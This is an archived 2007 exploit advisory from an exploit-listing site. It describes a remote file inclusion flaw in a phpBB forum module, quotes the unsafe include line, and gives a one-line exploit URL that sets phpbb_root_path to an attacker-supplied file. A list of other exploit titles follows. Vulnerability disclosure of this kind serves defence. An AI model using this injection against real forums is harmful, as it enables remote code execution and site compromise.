exploits , vulnerabilities , articles , phpBB MOD Forum picture and META tags 1.7 RFI Vulnerability

2007-03-31

phpBB MOD Forum picture and META tags 1.7 RFI Vulnerability

Rated as : Moderate Risk

Exploitname: phpBB Module Forum picture and META tags 1.7 File Include
Vulnerability

Vendor:
http://www.rfnnet.nl/downloads/phpbb/MOD_Forum_picture_and_META_tags.zip

Founder: bd0rk

Contact: bd0rk[at]hackermail.com

Greetings: str0ke, TheJT, Lu7k, CodeR

Vulnerable in MOD_forum_fields_parse.php: include($phpbb_root_path .
'MOD_forum_fields_default.php');

#$phpbb_root_path is not declared!



[+]Exploit:
http://[target]/[module_path]/MOD_forum_fields_parse.php?phpbb_root_path=FILE
 
securitydot.net - 2007-03-31

Exploits - newest 10 RSS | More

2007-06-15 56122 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 33422 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 41555 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 28782 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19312 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16331 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 18969 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16210 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33033 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 16845 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit